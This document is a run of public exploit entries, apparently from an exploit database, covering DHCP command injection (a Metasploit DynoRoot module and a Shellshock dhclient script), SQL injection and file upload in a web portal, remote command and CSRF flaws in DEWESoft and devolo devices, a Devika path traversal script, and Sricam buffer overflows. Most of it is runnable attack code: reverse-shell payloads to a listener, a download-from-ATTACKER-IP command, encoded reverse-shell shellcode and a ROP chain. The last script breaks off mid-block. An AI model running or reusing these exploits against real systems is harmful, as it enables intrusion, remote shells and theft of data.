##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
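class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DHCPServer

  # Module metadata. Every 'References' entry must be a [type, value] pair;
  # the original wrote the Exploit-DB entry as ['EDB': '44652'], which Ruby
  # parses as a one-element array holding a Hash ({EDB: '44652'}) and so
  # produces a broken reference. It is corrected to ['EDB', '44652'] here.
  #
  # @param info [Hash] metadata supplied by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DHCP Client Command Injection (DynoRoot)',
      'Description' => %q{
        This module exploits the DynoRoot vulnerability, a flaw in how the
        NetworkManager integration script included in the DHCP client in
        Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
        processes DHCP options. A malicious DHCP server, or an attacker on
        the local network able to spoof DHCP responses, could use this flaw
        to execute arbitrary commands with root privileges on systems using
        NetworkManager and configured to obtain network configuration using
        the DHCP protocol.
      },
      'Author' =>
        [
          'Felix Wilhelm', # Vulnerability discovery
          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Privileged' => true,
      'References' =>
        [
          ['AKA', 'DynoRoot'],
          ['CVE', '2018-1111'],
          ['EDB', '44652'],
          ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
          ['URL', 'https://dynoroot.ninja/'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
          ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
        ],
      'Targets' => [ [ 'Automatic Target', { }] ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 15 2018'
    ))

    # DHCPServer mixin options that #exploit never reads; hide them from the
    # operator so the module's option list only shows what matters.
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
  end

  # Runs the rogue DHCP server until its thread exits (or the module is
  # interrupted) and always stops the service afterwards.
  #
  # The server is started from a copy of the datastore and then given a
  # proxy_auto_discovery option carrying the encoded payload. The random
  # prefix, quote, '&' and trailing '#' around it indicate the option value
  # is interpolated into a shell command by the affected script (see the
  # Description); no other option is modified.
  def exploit
    opts = datastore.copy
    start_service(opts)
    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
    begin
      # Keep the module alive for as long as the server thread runs.
      sleep 2 while @dhcp.thread.alive?
    ensure
      stop_service
    end
  end
end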
# Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-07
# Vendor Homepage: https://www.weird-solutions.com
# Software : https://www.weird-solutions.com/download/products/dhcpbbv4_retail_x64.exe
# Tested Version: 4.1.0.1503
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DHCP"
DHCP Broadband 4 DHCP Broadband 4 C:\Program Files\DHCP Broadband 4\dhcpt.exe Auto
# Service info
C:\>sc qc "DHCP Broadband 4"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DHCP Broadband 4
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\DHCP Broadband 4\dhcpt.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : DHCP Broadband 4
DEPENDENCIAS : Nsi
: Afd
: NetBT
: Tcpip
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges, because the service's binary path contains spaces and is not quoted (see the NOMBRE_RUTA_BINARIO value above); quoting the path in the service configuration removes the issue.
#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *
# Disables scapy's answer-address check (presumably so broadcast replies are
# not discarded -- verify against the scapy version in use).
conf.checkIPaddr = False
# Hardware address of the sniffing interface; fam/hw are not referenced
# anywhere else in the visible script.
fam,hw = get_if_raw_hwaddr(conf.iface)

# Lease parameters the spoofed server hands out in detect_dhcp(); these are
# fixed lab values, not derived from the client's request.
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"

# Candidate option values written in the Shellshock function-definition
# form named in the title. Only the one bound to `rce` is ever sent; it is
# placed in the dump_path option by detect_dhcp().
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
def toMAC(strMac):
    """Convert a colon-separated MAC string ("00:50:56:c0:00:01") into its
    six raw bytes, as needed for the BOOTP chaddr field.

    Every colon-separated field is parsed as hexadecimal. Exactly the first
    six fields are packed: a string with fewer fields raises IndexError,
    extra fields are ignored, and a field outside 0..255 raises struct.error.
    """
    octets = [int(field, 16) for field in strMac.split(":")]
    return struct.pack('!6B',
                       octets[0], octets[1], octets[2],
                       octets[3], octets[4], octets[5])
def detect_dhcp(pkt):
    """Sniff callback: answer a DHCP Discover with a spoofed Offer and a DHCP
    Request with a spoofed Ack, both carrying `rce` in the dump_path option.

    Only packets with a DHCP layer are handled; the message type is taken
    from the first DHCP option (1 = Discover, 3 = Request, per the inline
    comments). Replies are sent to the broadcast MAC/IP on vmnet1 with the
    client's own MAC in chaddr and the request's xid echoed back, which is
    what makes the client accept them as answers to its own exchange.
    """
    # print 'Process ', ls(pkt)
    if DHCP in pkt:
        # if DHCP Discover then DHCP Offer
        if pkt[DHCP].options[0][1]==1:
            clientMAC = pkt[Ether].src
            print "DHCP Discover packet detected from " + clientMAC
            sendp(
                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                IP(src=server_ip,dst="255.255.255.255")/
                UDP(sport=67,dport=68)/
                BOOTP(
                    op=2,
                    yiaddr=victim_assign_ip,
                    siaddr=server_ip,
                    giaddr=gateway_ip,
                    chaddr=toMAC(clientMAC),
                    xid=pkt[BOOTP].xid,
                    sname=server_ip
                )/
                DHCP(options=[('message-type','offer')])/
                DHCP(options=[('subnet_mask',subnet_mask)])/
                DHCP(options=[('name_server',dns_ip)])/
                DHCP(options=[('lease_time',43200)])/
                DHCP(options=[('router',gateway_ip)])/
                DHCP(options=[('dump_path',rce)])/
                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
            )
            print "DHCP Offer packet sent"
        # if DHCP Request than DHCP ACK
        # NOTE(review): `pkt[DHCP] and` is redundant, the enclosing `if`
        # already established that the layer is present.
        if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
            clientMAC = pkt[Ether].src
            print "DHCP Request packet detected from " + clientMAC
            sendp(
                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                IP(src=server_ip,dst="255.255.255.255")/
                UDP(sport=67,dport=68)/
                BOOTP(
                    op=2,
                    yiaddr=victim_assign_ip,
                    siaddr=server_ip,
                    giaddr=gateway_ip,
                    chaddr=toMAC(clientMAC),
                    xid=pkt[BOOTP].xid
                )/
                DHCP(options=[('message-type','ack')])/
                DHCP(options=[('subnet_mask',subnet_mask)])/
                DHCP(options=[('lease_time',43200)])/
                DHCP(options=[('router',gateway_ip)])/
                DHCP(options=[('name_server',dns_ip)])/
                DHCP(options=[('dump_path',rce)])/
                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
            )
            print "DHCP Ack packet sent"
def main():
    """Capture DHCP/BOOTP traffic (UDP 67/68) on vmnet1 and hand every
    packet to detect_dhcp(); blocks until sniff() returns."""
    bpf_filter = "udp and (port 67 or 68)"
    sniff(iface="vmnet1", filter=bpf_filter, prn=detect_dhcp)
if __name__ == '__main__':
    # Process exit status follows main()'s return value (None -> 0).
    raise SystemExit(main())
# # # # #
# Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection
# Dork: N/A
# Date: 11.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows technician users to inject SQL commands.
#
# Vulnerable Source:
# .....................
# $customer = getCustomer($_GET['id']);
# ?>
# ....
# $ddaa = $pdo->query("SELECT * FROM vehicle WHERE customer='".$_GET['id']."' order by id desc");
# .....................
#
# Proof of Concept:
#
# http://localhost/[PATH]/vehicleadd.php?id=[SQL]
# -2'++UNION(SELECT+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129)--+-
#
# http://localhost/[PATH]/customerpage.php?id=[SQL]
#
# http://localhost/[PATH]/fileadd.php?id=[SQL]
#
# http://localhost/[PATH]/email.php?id=[SQL]
#
# Etc...
# # # # #
# # # # #
# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands and upload arbitrary files.
#
# Vulnerable Source:
# .....................
# $eid = $_GET["id"];
# ......
# $folder = "img/users/";
# $extention = strrchr($_FILES['bgimg']['name'], ".");
# $bgimg = $_FILES['bgimg']['name'];
# //$bgimg = $new_name.'.jpg';
# $uploaddir = $folder . $bgimg;
# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);
# .....................
#
# Proof of Concept:
#
# An arbitrary file can be uploaded as the customer profile picture.
#
# http://localhost/[PATH]/customerupdate.php?id=1
# http://localhost/[PATH]/img/users/[FILE].php
#
#####
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, updates, or action on the issue from the vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
devolo dLAN 550 duo+ Starter Kit Remote Code Execution
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is a Powerline adapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The devolo firmware has what seem to be 'hidden' services which
can be enabled by an authenticated attacker via the htmlmgr CGI script.
This allows the attacker to start services that are deprecated or discontinued
and achieve remote arbitrary code execution with root privileges.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5508
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php
04.10.2017
--
The htmlmgr CGI script that is accessible via the web does not validate or sanitize
the configuration parameters that a user wants to change. This allows an attacker
to change configuration parameters, including parameters that are not even shown in
the web administration panel.
Services that an attacker can enable in this way include telnet and the remote maintenance
shell; the attacker can then log in as the 'root' user, which has no password.
In order for an attacker to achieve this, he would need to change the following two values:
System.Baptization.Telnetd <- to enable telnet
System.Baptization.shell <- to enable remote maintenance shell
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.Telnetd=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.shell=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
Since the configuration is read from a file on boot time, an attacker would also
need to somehow make the device to restart. This can be done by issuing the 'reboot'
command again from the html cgi script: System.Reboot
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Reboot=OLACANYOUREBOOT&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
After the reboot the devolo device will have a telnet service on TCP port 23 opened
and an attacker can now login to the device with user 'root' and no password.
--------
Trying DEVOLO-IP...
Connected to DEVOLO-IP.
Escape character is '^]'.
dlanwireless login: root
# whoami
root
#
--------
The attacker then has complete access over the device. t00t.
devolo dLAN 550 duo+ Starter Kit Cross-Site Request Forgery
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is a Powerline adapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The web application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. The
devolo web application uses predictable URL/form actions in a repeatable way.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5507
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php
04.10.2017
--
curl -i -s -k -X 'POST' \
-H 'Origin: http://DEVOLO-IP' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://DEVOLO-IP/cgi-bin/htmlmgr?_file=%2Fwgl%2Fmain.wgl&_sid=&_style=std&_lang=&_dir=expert&_page=time' \
--data-binary $'%3Asys%3ANTPClient.EnableNTP=on&%3Asys%3ANTPClient.NTPServer=waddup.com&%3Asys%3ANTPClient.GMTOffset=%2B01%3A00&%3Asys%3ANTPClient.AutoDaylightSaving=on&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=expert&_page=time&_idx=&_sid=&_csrf=' \
'http://DEVOLO-IP/cgi-bin/htmlmgr'
Even though a '_csrf' parameter is submitted, it is never checked (nor does it contain any value).
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422
#!/usr/bin/python
import argparse
import requests
def exploit(target_url):
    """Request /api/get-browser-snapshot with a traversal sequence in the
    `snapshot_path` query parameter and print the response body.

    `target_url` is used as the host part only: the scheme is fixed to
    plain http and the API path is appended. The request carries no
    timeout, so an unresponsive host makes the script hang.
    """
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }
    response = requests.get(url, params=params)
    print(response.text)
if __name__ == "__main__":
    # Single required option: the host to send the request to.
    cli = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    cli.add_argument('-t', '--target', required=True, help='Target URL (e.g., target.com)')
    exploit(cli.parse_args().target)
# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7
#!/usr/bin/python
# Steps to reproduce:
# 1. Generate the payload executing the PoC
# 2. Login in the Sricam DeviceViewer application as any registered user
# 3. Go to System Tools -> Change Password
# 4. Set the old password as the malicious payload, and the new password as whatever you want
# 5. The password will be changed with the new one
# 6. To confirm, restart the application and try to login with the new password
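# 5000-byte filler that the reproduction steps above paste into the
# "old password" field.
payload = "A" * 5000

try:
    # The context manager closes the file even when write() fails; the
    # original only closed it on the success path.
    with open("bypass.txt","w") as bypass:
        print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
        print("### Author: Alessandro Magnosi\n")
        print("[*] Creating old password file")
        bypass.write(payload)
    print("[+] Old password file created\n")
    print("[i] When changing password, set the old password to the file contents")
    print("[i] Close the program and reopen it")
    print("[i] Log in with new password")
except OSError as exc:
    # Only file-system failures are expected here; the original bare
    # `except:` also hid KeyboardInterrupt and programming errors, and
    # gave no hint of what went wrong.
    print("[!] Error creating the file: %s" % exc)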
# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
# Discovery Date: 25/04/2019
# Exploit Author: Hayden Wright
# Vendor Homepage: www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows XP Pro x64, Windows 7 32bit
# CVE : CVE-2019-11563
#!/usr/bin/python
import struct
#------------------------------------------------------------#
# CVE-2019-11563 #
# #
# Sricam DeviceViewer.exe 'username' field SEH overflow #
# by Hayden Wright #
# #
# (*) badchars = '\x00\x0a\x0d' #
# (*) SEH = 0x6a413969 OFFSET 268 #
# (*) nSEH = 268 -4 #
# #
# 69901d06 5E POP ESI #
# 69901d07 5F POP EDI #
# 69901d08 C3 RETN #
# #
#------------------------------------------------------------#
#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
# Opaque stage emitted by the msfvenom command quoted above (its target
# host/port and the excluded bytes '\x00\x0a\x0d' are documented there).
# Treat as data: do not edit by hand.
shellcode =(
    "\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
    "\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
    "\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
    "\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
    "\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
    "\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
    "\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
    "\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
    "\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
    "\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
    "\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
    "\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
    "\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
    "\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
    "\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
    "\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
    "\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
    "\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
    "\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
    "\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
    "\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
    "\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
    "\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
    "\x1d\x0b\x12\x82\x1e\x1e")
max_size = 4000
# Buffer layout, matching the header comment (SEH at offset 268, nSEH at
# 264): 264 bytes of filler, the 4-byte nSEH, the 4-byte SEH address, a
# NOP sled, the shellcode, then padding up to max_size.
buf = 'A'*264
buf += '\xeb\x06\x90\x90' #jump short 6-bytes
buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll
buf += '\x90' * 16
buf += shellcode
buf += 'C'*(max_size - len(buf))
print '[+] %s bytes buffer created...' %len(buf)
try:
    filename = 'CVE-2019-11563.txt'
    file = open(filename , 'w')
    file.write(buf)
    print '[+] Evil buffer saved to file: ' + filename
    print '[+] Copy + paste its contents into the "user" field and hit login'
    file.close()
except:
    # NOTE(review): bare except hides the actual error and leaves the file
    # handle open if write() fails.
    print "[!] Could not create file!"
# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1
# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear
#!/usr/bin/python
from struct import pack, unpack
def create_rop_chain():
    """Build the DEP-bypass ROP chain as a packed little-endian byte string.

    Every entry is a 32-bit address in the application's bundled DLLs
    (avcodec-54 / avutil-50 / avformat-54) except the WinExec pointer,
    which is a hard-coded kernel32 address and must be adjusted per
    machine (step 1 of the reproduction notes above). The per-gadget
    comments document what each address does.
    """
    rops = [
        0x6a1142aa, # XOR EDX,EDX # RETN
        0x6a569810, # POP EDX # RETN [avcodec-54.dll]
        0x6ae9c126, # &Writable location [avutil-50.dll]
        0x6a5dac8a, # POP EAX # RETN
        0xff9b929d, # NEG "cmd\0"
        0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]
        0x6994766b, # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a18e062, # ADD ESP, 10 # RETN ---> ESI
        0x6a2420ea, # ROP NOP ---> EDI
        0x6a45e446, # XCHG EAX,EDX # RETN [avcodec-54.dll]
        0x6a29d716, # XCHG EAX,ECX # RETN [avcodec-54.dll]
        ## ECX = ascii "cmd\0"
        0x6a569810, # POP EDX # RETN [avcodec-54.dll]
        0x6a36264a, # CALL EBX
        ## EDX = CALL EBX
        0x6a5dac8a, # POP EAX # RETN
        0x76e33231, # ptr to WinExec() [kernel32.dll]
        #### Unfortunately, this has to be hardcoded as no reliable pointer is available in the application
        0x6a150411, # XCHG EAX,EBX # RETN [avcodec-54.dll]
        ## EBX = &WinExec
        0x6a5dac8a, # POP EAX # RETN
        0xffffffff, # -0x00000001-> ebx
        0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]
        ## EAX = 1
        0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
        0x6a2420ea, # ROP NOP
    ]
    return ''.join(pack('<I', _) for _ in rops)
def nops(length):
    """Return `length` NOP bytes (0x90) as a string; a length of zero or
    less yields the empty string."""
    return "".join("\x90" for _ in range(length))
rop_chain = create_rop_chain()
maxlen = 5000
# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)
# Don't care nseh
nseh = nops(4)
# Layout: 8 NOPs, the ROP chain padded so that the region holding it is
# exactly 360 bytes, 20 NOPs, nSEH, SEH, 300 NOPs; then filled to maxlen.
payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000
print("Exploit Length: " + str(len(payload)))
try:
    fname = "exprop.txt"
    exploit = open(fname,"w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except:
    # NOTE(review): bare except hides the actual error and leaves the file
    # handle open if write() fails.
